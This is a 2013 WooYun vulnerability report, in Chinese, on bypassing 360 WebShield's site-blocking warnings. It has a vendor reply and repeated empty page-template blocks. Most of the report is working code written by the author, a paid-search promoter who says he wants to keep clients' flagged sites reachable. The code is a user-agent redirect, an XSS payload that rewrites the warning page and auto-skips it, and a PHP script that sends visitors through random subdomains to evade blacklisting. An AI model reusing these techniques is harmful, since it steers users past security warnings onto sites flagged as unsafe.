我是如何利用xss绕过360网盾做防360拦截空间的

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-028163

漏洞标题：我是如何利用xss绕过360网盾做防360拦截空间的

漏洞作者： z7y

提交时间：2013-07-08 14:02

修复时间：2013-08-22 14:02

公开时间：2013-08-22 14:02

漏洞类型：xss跨站脚本攻击

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-07-08：细节已通知厂商并且等待厂商处理中
2013-07-08：厂商已经确认，细节仅向厂商公开
2013-07-18：细节向核心白帽子及相关领域专家公开
2013-07-28：细节向普通白帽子公开
2013-08-07：细节向实习白帽子公开
2013-08-22：细节向公众公开

简要描述：

本人做百度竞价推广,经常有客户网站被360拦截了,让我想想办法...屌丝只好从命,琢磨一番360网盾了~ 几个页面+服务器安全狗+两个空间,就可以实现此功能！（现已修复其一）
【我这方法是针对百度推广竞价的客户而成,排名那些网站应该无效,但是百度竞价可以】

详细说明：

<%
Dim ua 
ua = Request.ServerVariables("HTTP_USER_AGENT")
If (Instr(ua, "Windows NT 5.1") = 0 or Instr(ua, "Windows NT 6.1") = 0)  and Instr(ua, "MSIE")>0 Then '除了 xp win7 以外的系统
Response.Redirect("index1.asp")
else
Response.Redirect("index2.asp")
End IF
%>

index1.asp内容：

<%
 dim url
 y=""""
url = "http://www.已被拦截域名.com/?<img/onerror="& y &"document.title='';document.getElementById('safemon').action='http://www.已被拦截域名.com/?';document.getElementsByTagName('div')[0].innerHTML='';forceOpenUrl();"& y &"src=0>"  
response.redirect url
%>
这里目的可以看下拦截页面源码
//忽略警告，继续访问
function forceOpenUrl() { 
	if(warn_from=='se6'){
        external.AppCmd(external.GetSID(window),"sesafe","safebrowsing_openurl", ucode,"", function(i1,s1){})
        location.href = jump;                                      
        return;    
    }else{
    	document.getElementById("safemon").submit();
	}
}
 
function closeWindow(){
    window.opener=null; 
    window.open('','_self'); 
    window.close(); 
}

index2.asp内容:

<script type="text/javascript">
var str=window.location.href;
str=str.split("&@;mk");
if(str[1]!=""){
window.location.href="z7y.php?p="+str[1];
}
</script>

z7y.php内容：

<?php
function randomkeys($length)
{
 $pattern='1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLOMNOPQRSTUVWXYZ';
 for($i=0;$i<$length;$i++)
 {
   $key .= $pattern{mt_rand(0,35)};    //php随机数
 }
 return $key;
}
header('HTTP/1.1 404');
ob_start();
phpinfo();
$url="http://".randomkeys(5).".xxxx.info/";
 $list1=$_GET["/l?"]; 
 $rurl=$url.$list1."";
header("location: $rurl");
ob_end_clean();
?>

一个星期前360尚未修复index1.asp内容所实现功能
修复后：

算是一个XSS把..能弹窗什么的,甚至能把【这是一个不安全的网站】变成【这是一个可信的网站】,而且无需任何操作自动跳过这个提示不安全网站的框框~
index2.asp是一个泛域名脚本,此方法依然有效. 一个www域名主页放一个图片什么的，毫无敏感词的index.asp主页,然后就自动跳转到 5随机数.xxx.info 域名,这样360除非人工拉域名进黑名单,否则一直都是二级域名被拦截,但是一直是5位随机数,拦截都无所谓~~
至于还有一些新防拦截方法,下期再公布...总之对360网盾有很多逻辑问题,各种奇淫技巧可以绕过拦截。

漏洞证明：

一个星期前360尚未修复index1.asp内容所实现功能
修复后：

修复方案：

最好就不修复了- 0 -.....

版权声明：转载请注明来源 z7y@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2013-07-08 19:49

厂商回复：

感谢反馈。这是网盾在处理未经浏览器编码的URL时导致的XSS，主要影响IE浏览器。我们已紧急修复。
对于域名泛解析问题，网盾拦截以黑优先，域名泛解析不会影响拦截效果。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-028163

漏洞标题：我是如何利用xss绕过360网盾做防360拦截空间的

相关厂商：奇虎360

漏洞作者： z7y

提交时间：2013-07-08 14:02

修复时间：2013-08-22 14:02

公开时间：2013-08-22 14:02

漏洞类型：xss跨站脚本攻击

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 z7y@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-028163

漏洞标题：我是如何利用xss绕过360网盾做防360拦截空间的

相关厂商：奇虎360

漏洞作者： z7y

提交时间：2013-07-08 14:02

修复时间：2013-08-22 14:02

公开时间：2013-08-22 14:02

漏洞类型：xss跨站脚本攻击

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-028163"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 z7y@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：